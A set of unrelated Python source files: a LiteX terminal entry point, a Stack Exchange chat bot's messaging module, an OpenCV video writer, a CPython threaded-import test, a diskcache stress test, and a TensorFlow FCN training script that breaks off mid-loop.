parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type: jtag_uart (default), jtag_atlantic")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images)
if sys.platform == "win32":
if args.port in ["bridge", "jtag"]:
raise NotImplementedError
if args.port in ["bridge", "crossover"]: # FIXME: 2021-02-18, crossover for retro-compatibility remove and update targets?
bridge = BridgeUART(name=args.bridge_name)
bridge.open()
port = os.ttyname(bridge.name)
elif args.port in ["jtag"]:
if args.jtag_name == "jtag_atlantic":
term.port = Nios2Terminal()
port = args.port
term.payload_length = 128
term.delay = 1e-6
elif args.jtag_name == "jtag_uart":
bridge = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
bridge.open()
port = os.ttyname(bridge.name)
else:
raise NotImplementedError
else:
port = args.port
term.open(port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
chatcommunicate.py | from ChatExchange.chatexchange import events
from ChatExchange.chatexchange.messages import Message
from chatexchange_extension import Client
import collections
import itertools
import os.path
import pickle
import queue
import regex
import requests
import sys
import threading
import time
import yaml
import datahandling
from deletionwatcher import DeletionWatcher
from excepthook import log_exception
from globalvars import GlobalVars
from parsing import fetch_post_url_from_msg_content, fetch_owner_url_from_msg_content
LastMessages = collections.namedtuple("LastMessages", ["messages", "reports"])
class RoomData:
def __init__(self, room, block_time, deletion_watcher):
self.room = room
self.block_time = block_time
self.deletion_watcher = deletion_watcher
class CmdException(Exception):
pass
_commands = {"reply": {}, "prefix": {}}
_clients = {
"stackexchange.com": None,
"stackoverflow.com": None,
"meta.stackexchange.com": None
}
_command_rooms = set()
_watcher_rooms = set()
_room_roles = {}
_privileges = {}
_global_block = -1
_rooms = {}
_last_messages = LastMessages({}, collections.OrderedDict())
_msg_queue = queue.Queue()
_pickle_run = threading.Event()
def init(username, password):
global _clients
global _rooms
global _room_data
global _last_messages
for site in _clients.keys():
client = Client(site)
for _ in range(10):
try:
client.login(username, password)
break
except:
pass
else:
raise Exception("Failed to log into " + site)
_clients[site] = client
if os.path.exists("rooms_custom.yml"):
parse_room_config("rooms_custom.yml")
else:
parse_room_config("rooms.yml")
if not GlobalVars.standby_mode:
join_command_rooms()
if os.path.isfile("messageData.p"):
try:
_last_messages = pickle.load(open("messageData.p", "rb"))
except EOFError:
pass
threading.Thread(name="pickle ---rick--- runner", target=pickle_last_messages, daemon=True).start()
threading.Thread(name="message sender", target=send_messages, daemon=True).start()
def join_command_rooms():
for site, roomid in _command_rooms:
room = _clients[site].get_room(roomid)
deletion_watcher = (site, roomid) in _watcher_rooms
room.join()
room.watch_socket(on_msg)
_rooms[(site, roomid)] = RoomData(room, -1, deletion_watcher)
def parse_room_config(path):
with open(path, "r") as room_config:
room_dict = yaml.load(room_config.read())
for site, site_rooms in room_dict.items():
for roomid, room in site_rooms.items():
room_identifier = (site, roomid)
_privileges[room_identifier] = set(room["privileges"]) if "privileges" in room else set()
if "commands" in room and room["commands"]:
_command_rooms.add(room_identifier)
if "watcher" in room and room["watcher"]:
_watcher_rooms.add(room_identifier)
if "msg_types" in room:
add_room(room_identifier, room["msg_types"])
def add_room(room, roles):
for role in roles:
if role not in _room_roles:
_room_roles[role] = set()
_room_roles[role].add(room)
def pickle_last_messages():
while True:
_pickle_run.wait()
_pickle_run.clear()
with open("messageData.p", "wb") as pickle_file:
pickle.dump(_last_messages, pickle_file)
def send_messages():
while True:
room, msg, report_data = _msg_queue.get()
full_retries = 0
while full_retries < 3:
try:
response = room.room._client._do_action_despite_throttling(("send", room.room.id, msg)).json()
if "id" in response:
identifier = (room.room._client.host, room.room.id)
message_id = response["id"]
if identifier not in _last_messages.messages:
_last_messages.messages[identifier] = collections.deque((message_id,))
else:
last = _last_messages.messages[identifier]
if len(last) > 100:
last.popleft()
last.append(message_id)
if report_data:
_last_messages.reports[(room.room._client.host, message_id)] = report_data
if len(_last_messages.reports) > 50:
_last_messages.reports.popitem(last=False)
if room.deletion_watcher:
threading.Thread(name="deletion watcher",
target=DeletionWatcher.check_if_report_was_deleted,
args=(report_data[0], room.room._client.get_message(message_id))).start()
_pickle_run.set()
break
except requests.exceptions.HTTPError:
full_retries += 1
_msg_queue.task_done()
def on_msg(msg, client):
if isinstance(msg, events.MessagePosted) or isinstance(msg, events.MessageEdited):
message = msg.message
if message.owner.id == client._br.user_id:
return
room_data = _rooms[(client.host, message.room.id)]
if message.parent and message.parent.owner.id == client._br.user_id:
strip_mention = regex.sub("^(<span class='mention'>)?@.*?(</span>)? ", "", message.content)
cmd = GlobalVars.parser.unescape(strip_mention).lower().split(" ", 1)[0]
result = dispatch_reply_command(message.parent, message, cmd)
if result:
_msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
elif message.content.startswith("sd "):
result = dispatch_shorthand_command(message)
if result:
_msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
elif message.content.startswith("!!/"):
result = dispatch_command(message)
if result:
_msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
def tell_rooms_with(prop, msg, notify_site="", report_data=None):
tell_rooms(msg, (prop,), (), notify_site=notify_site, report_data=report_data)
def tell_rooms_without(prop, msg, notify_site="", report_data=None):
tell_rooms(msg, (), (prop,), notify_site=notify_site, report_data=report_data)
def tell_rooms(msg, has, hasnt, notify_site="", report_data=None):
global _rooms
msg = msg.rstrip()
target_rooms = set()
for prop_has in has:
if prop_has not in _room_roles:
continue
for room in _room_roles[prop_has]:
if all(map(lambda prop: prop not in _room_roles or room not in _room_roles[prop], hasnt)):
if room not in _rooms:
site, roomid = room
deletion_watcher = room in _watcher_rooms
new_room = _clients[site].get_room(roomid)
new_room.join()
_rooms[room] = RoomData(new_room, -1, deletion_watcher)
target_rooms.add(room)
for room_id in target_rooms:
room = _rooms[room_id]
if notify_site:
pings = datahandling.get_user_names_on_notification_list(room.room._client.host,
room.room.id,
notify_site,
room.room._client)
msg_pings = datahandling.append_pings(msg, pings)
else:
msg_pings = msg
timestamp = time.time()
if room.block_time < timestamp and _global_block < timestamp:
if report_data and "delay" in _room_roles and room_id in _room_roles["delay"]:
threading.Thread(name="delayed post",
target=DeletionWatcher.post_message_if_not_deleted,
args=(msg_pings, room, report_data)).start()
else:
_msg_queue.put((room, msg_pings, report_data))
def get_last_messages(room, count):
identifier = (room._client.host, room.id)
if identifier not in _last_messages.messages:
return
for msg_id in itertools.islice(reversed(_last_messages.messages[identifier]), count):
yield room._client.get_message(msg_id)
def get_report_data(message):
identifier = (message._client.host, message.id)
if identifier in _last_messages.reports:
return _last_messages.reports[identifier]
else:
post_url = fetch_post_url_from_msg_content(message.content_source)
if post_url:
return (post_url, fetch_owner_url_from_msg_content(message.content_source))
def is_privileged(user, room):
return user.id in _privileges[(room._client.host, room.id)] or user.is_moderator
def block_room(room_id, site, time):
global _global_block
if room_id is None:
_global_block = time
else:
_rooms[(site, room_id)].block_time = time
def command(*type_signature, reply=False, whole_msg=False, privileged=False, arity=None, aliases=None, give_name=False):
if aliases is None:
aliases = []
def decorator(func):
def f(*args, original_msg=None, alias_used=None, quiet_action=False):
if privileged and not is_privileged(original_msg.owner, original_msg.room):
return GlobalVars.not_privileged_warning
if whole_msg:
processed_args = [original_msg]
else:
processed_args = []
try:
try:
processed_args.extend([coerce(arg) if arg else arg for coerce, arg in zip(type_signature, args)])
except ValueError as e:
return "Invalid input type given for an argument"
if give_name:
result = func(*processed_args, alias_used=alias_used)
else:
result = func(*processed_args)
return result if not quiet_action else ""
except CmdException as e:
return str(e)
except:
log_exception(*sys.exc_info())
return "I hit an error while trying to run that command; run `!!/errorlogs` for details."
cmd = (f, arity if arity else (len(type_signature), len(type_signature)))
if reply:
_commands["reply"][func.__name__] = cmd
for alias in aliases:
_commands["reply"][alias] = cmd
else:
_commands["prefix"][func.__name__] = cmd
for alias in aliases:
_commands["prefix"][alias] = cmd
return f
return decorator
def message(msg):
assert isinstance(msg, Message)
return msg
def dispatch_command(msg):
command_parts = GlobalVars.parser.unescape(msg.content).split(" ", 1)
if len(command_parts) == 2:
cmd, args = command_parts
else:
cmd, = command_parts
args = ""
if len(cmd) == 3:
return
command_name = cmd[3:].lower()
quiet_action = command_name[-1] == "-"
command_name = regex.sub(r"[[:punct:]]*$", "", command_name)
if command_name not in _commands["prefix"]:
return "No such command '{}'.".format(command_name)
else:
func, (min_arity, max_arity) = _commands["prefix"][command_name]
if max_arity == 0:
return func(original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
elif max_arity == 1:
if min_arity == 1 and not args:
return "Missing an argument."
return func(args or None, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
else:
args = args.split()
if len(args) < min_arity:
return "Too few arguments."
elif len(args) > max_arity:
return "Too many arguments."
else:
args.extend([None] * (max_arity - len(args)))
return func(*args, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
def dispatch_reply_command(msg, reply, cmd):
quiet_action = cmd[-1] == "-"
cmd = regex.sub(r"\W*$", "", cmd)
if cmd in _commands["reply"]:
func, arity = _commands["reply"][cmd]
assert arity == (1, 1)
return func(msg, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
def dispatch_shorthand_command(msg):
commands = GlobalVars.parser.unescape(msg.content[3:]).split()
if len(commands) == 0:
return
output = []
processed_commands = []
for cmd in commands:
count, cmd = regex.match(r"^(\d*)(.*)", cmd).groups()
for _ in range(int(count) if count else 1):
processed_commands.append(cmd)
should_return_output = False
for current_command, message in zip(processed_commands, get_last_messages(msg.room, len(processed_commands))):
if current_command == "-":
output.append("[:{}] <skipped>".format(message.id))
else:
result = dispatch_reply_command(message, msg, current_command)
if result:
should_return_output = True
output.append("[:{}] {}".format(message.id, result))
else:
output.append("[:{}] <processed without return value>".format(message.id))
return "\n".join(output) if should_return_output else ""
|
videowriter.py | """
Copyright 2018-2021 Accenture
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os, sys
current_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(current_dir))
import cv2
import shutil
from threading import Thread, RLock
from queue import Queue, Full, Empty
import vidtools as vid
class VideoWriter(object):
''' OpenCV VideoWriter wrapper '''
def __init__(self, output_path, resolution, fps, codec="avc1", compress=True, placeholder=False, bgr_to_rgb=False):
self.write_mode = "images" if os.path.isdir(output_path) else "video"
self.resolution = resolution
self.output_path = output_path
self.compress = compress
self.fourcc = cv2.VideoWriter_fourcc(*codec)
self.fps = fps
self.writer = None
# makes this object an empty shell (placeholder)
# to ensure syntactic correctness without the need
# to modify the "with" block when conditionally disabling video writing
self.placeholder = placeholder
self.bgr_to_rgb = bgr_to_rgb
self.frames_written = 0
def __enter__(self):
if not self.placeholder:
print(f"VideoWriter: writing output {self.write_mode} to {self.output_path}")
self.init()
return self
def __exit__(self, type, value, traceback):
if not self.placeholder:
self.close()
def init(self):
os.makedirs(os.path.dirname(self.output_path), exist_ok=True)
if self.write_mode == "video":
self.writer = cv2.VideoWriter(
self.output_path, self.fourcc, int(self.fps), self.resolution)
def close(self):
if self.write_mode == "video":
self.writer.release()
if self.compress:
if shutil.which("ffmpeg"):
print("Compressing video...")
new_output_path = vid.compress_video(self.output_path, create_copy=True)
os.remove(self.output_path)
self.output_path = new_output_path
else:
print("WARNING: FFmpeg executable not found, skipping compression...")
print("Wrote output to:", self.output_path)
def write(self, frame, title=None):
if not self.placeholder:
if self.write_mode == "video":
if self.bgr_to_rgb:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.writer.write(cv2.resize(frame, self.resolution, interpolation=cv2.INTER_CUBIC))
else:
if title is None:
cv2.imwrite(os.path.join(self.output_path, f'frame_{self.frames_written + 1}.png'), frame)
else:
cv2.imwrite(os.path.join(self.output_path, f'{title}.png'), frame)
self.frames_written += 1
class AsyncVideoWriter(VideoWriter):
""" Asynchronous version of the VideoWriter module """
def __init__(self, output_path, resolution, fps, codec="avc1", compress=True, placeholder=False,
bgr_to_rgb=False, max_size=10):
super().__init__(output_path, resolution, fps, codec, compress, placeholder, bgr_to_rgb)
self._lock = RLock()
self._buffer = Queue(maxsize = max_size)
self._writer = None
self._running = False
def __enter__(self):
if not self.placeholder:
super().init()
self.init()
return self
def __exit__(self, type, value, traceback):
if not self.placeholder:
self.close()
super().close()
def init(self):
if self._running:
self.close()
with self._buffer.mutex:
self._buffer.queue.clear()
with self._lock:
self._running = True
self._writer = Thread(target = self._write_async)
self._writer.daemon = False
self._writer.start()
def close(self):
with self._lock:
self._running = False
self._writer.join()
def write(self, frame, title=None):
if not self.placeholder:
put_success = False
while not put_success:
if not self._running:
return
try:
self._buffer.put_nowait((frame, title))
except Full:
pass
else:
put_success = True
def _write_async(self):
while self._running:
get_success = False
while not get_success:
if not self._running and self._buffer.empty():
return
try:
frame, title = self._buffer.get_nowait()
super().write(frame, title)
except Empty:
pass
else:
get_success = True
|
test_threaded_import.py | # This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import threading
import unittest
from unittest import mock
from test.support import (
verbose, run_unittest, TESTFN,
forget, unlink, rmtree)
from test.support import threading_helper
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
def mock_register_at_fork(func):
# bpo-30599: Mock os.register_at_fork() when importing the random module,
# since this function doesn't allow to unregister callbacks and would leak
# memory.
return mock.patch('os.register_at_fork', create=True)(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
@mock_register_at_fork
def check_parallel_module_init(self, mock_os):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
with threading_helper.start_threads(
threading.Thread(target=task, args=(N, done, done_tasks, errors,))
for i in range(N)):
pass
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.test_importlib.threaded_import_hangers']
except KeyError:
pass
import test.test_importlib.threaded_import_hangers
self.assertFalse(test.test_importlib.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
@mock_register_at_fork
def test_side_effect_import(self, mock_os):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()
t = None"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
del sys.modules[TESTFN]
@threading_helper.reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
stress_test_index_mp.py | """Stress test diskcache.persistent.Index."""
from __future__ import print_function
import itertools as it
import multiprocessing as mp
import os
import random
import time
import diskcache as dc
KEYS = 100
OPERATIONS = 10000
SEED = 0
functions = []
def register(function):
functions.append(function)
return function
@register
def stress_get(index):
key = random.randrange(KEYS)
index.get(key, None)
@register
def stress_set(index):
key = random.randrange(KEYS)
value = random.random()
index[key] = value
register(stress_set)
register(stress_set)
register(stress_set)
@register
def stress_del(index):
key = random.randrange(KEYS)
try:
del index[key]
except KeyError:
pass
@register
def stress_pop(index):
key = random.randrange(KEYS)
index.pop(key, None)
@register
def stress_popitem(index):
try:
if random.randrange(2):
index.popitem()
else:
index.popitem(last=False)
except KeyError:
pass
@register
def stress_iter(index):
iterator = it.islice(index, 5)
for key in iterator:
pass
@register
def stress_reversed(index):
iterator = it.islice(reversed(index), 5)
for key in iterator:
pass
@register
def stress_len(index):
len(index)
def stress(seed, index):
random.seed(seed)
for count in range(OPERATIONS):
function = random.choice(functions)
function(index)
def test(status=False):
if os.environ.get('TRAVIS') == 'true':
return
if os.environ.get('APPVEYOR') == 'True':
return
random.seed(SEED)
index = dc.Index(enumerate(range(KEYS)))
processes = []
for count in range(8):
process = mp.Process(target=stress, args=(SEED + count, index))
process.start()
processes.append(process)
for value in it.count():
time.sleep(1)
if status:
print('\r', value, 's', len(index), 'keys', ' ' * 20, end='')
if all(not process.is_alive() for process in processes):
break
if status:
print('')
assert all(process.exitcode == 0 for process in processes)
if __name__ == '__main__':
test(status=True)
|
train.py | # --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
import sys
import threading
import math
class SolverWrapper(object):
"""A simple wrapper around Caffe's solver.
This wrapper gives us control over he snapshotting process, which we
use to unnormalize the learned bounding-box regression weights.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
self.pretrained_ckpt = pretrained_ckpt
# For checkpoint
self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
def snapshot(self, sess, iter):
"""Take a snapshot of the network after unnormalizing the learned
bounding-box regression weights. This enables easy use at test-time.
"""
net = self.net
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
self.saver.save(sess, filename, write_meta_graph=False)
print 'Wrote snapshot to: {:s}'.format(filename)
def restore(self, session, save_file):
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
var_name_to_var = {var.name : var for var in tf.global_variables()}
restore_vars = []
restored_var_names = set()
print('Restoring:')
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
for var_name, saved_var_name in var_names:
if 'global_step' in var_name:
continue
if 'Variable' in var_name:
continue
curr_var = var_name_to_var[var_name]
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
print(str(saved_var_name))
restored_var_names.add(saved_var_name)
else:
print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
if len(ignored_var_names) == 0:
print('Restored all variables')
else:
print('Did not restore:' + '\n\t'.join(ignored_var_names))
if len(restore_vars) > 0:
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
print('Restored %s' % save_file)
def train_model(self, sess, train_op, loss, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
tf.summary.scalar('loss', loss)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
print self.pretrained_ckpt
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op])
train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
"""Network training loop."""
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
